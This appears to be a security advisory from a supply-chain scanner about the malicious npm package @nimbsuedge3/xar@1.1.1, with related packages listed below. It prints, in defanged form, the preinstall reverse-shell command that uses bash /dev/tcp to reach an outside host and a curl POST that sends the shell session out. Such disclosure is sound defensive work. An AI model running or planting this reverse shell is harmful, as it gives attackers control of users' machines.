@nimbsuedge3/xar@1.1.1
Malicious code in @nimbsuedge3/xar (npm)
T1059.004 · Unix ShellT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel
Analysis
The package's preinstall hook opens an interactive reverse shell to 147[.]93[.]157[.]202[.]nip[.]io:8080 (`bash -i >& /dev/tcp/147[.]93[.]157[.]202[.]nip[.]io/8080 0>&1`) and pipes the shell session to a curl POST to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php. Installing the package gives the remote host an interactive shell on the installer's machine. The package ships no other code (package.json only).
- analyzed by
- Leitwacht
- first seen
- Sep 21, 2026, 01:33 AM
- analyzed
- Sep 21, 2026, 01:33 AM
Related advisories
- @nimbusedge2/xa@1.1.0
- @nimbusedge2/x@1.1.1
- @nimbusedge2/auth@1.1.1
- strapi-plugin-feedmeeb@3.6.8
- strapi-plugin-persh-meeb@3.6.8
- strapi-plugin-ccrec-meeb@3.6.8
- strapi-plugin-ccresh-meeb@3.6.8
- strapi-plugin-revs02-meeb322k@3.6.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.